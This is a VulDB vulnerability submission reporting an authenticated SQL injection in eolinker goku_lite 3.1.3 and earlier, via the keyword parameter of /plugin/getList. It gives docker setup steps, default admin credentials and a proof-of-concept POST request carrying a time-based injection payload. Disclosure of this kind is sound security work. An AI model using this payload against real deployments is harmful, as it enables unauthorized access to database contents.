| 제목 | goku_lite <= 3.1.3 Authenticated SQL injection via /plugin/getList route and keyword parameter |
|---|
| 설명 | # Get start
repo: ** https://github.com/eolinker/goku_lite **
- Execute docker command
- Start goku
```bash
docker run
docker run -dt -p 7000:7000
-v /app/goku-ce/work:/app/goku-ce/console/work
-e GOKU_ADMIN_PASSWORD=123456
--network=goku-ce
--ip 172.18.12.2
--name goku-ce-console
eolinker/goku-api-gateway-ce-console
```
user/pass:
admin/123456
# vulnerability
goku_lite <= 3.1.3 Authenticated SQL injection via /plugin/getList route and keyword parameter
use admin/123456 to login
POC:
Request URL: http://testlink:7000/plugin/getList
Request Method: POST
PostData: keyword=' AND 8247=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- PSdW
Use sqlmap :


Please show QSec-Team in the detail of cve page.
Thanks,
QSec-Team |
|---|
| 사용자 | qsec (UID 33968) |
|---|
| 제출 | 2022. 11. 11. PM 12:25 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 11. 11. PM 01:14 (48 minutes later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 213454 [eolinker goku_lite /plugin/getList route/keyword SQL 주입] |
|---|
| 포인트들 | 17 |
|---|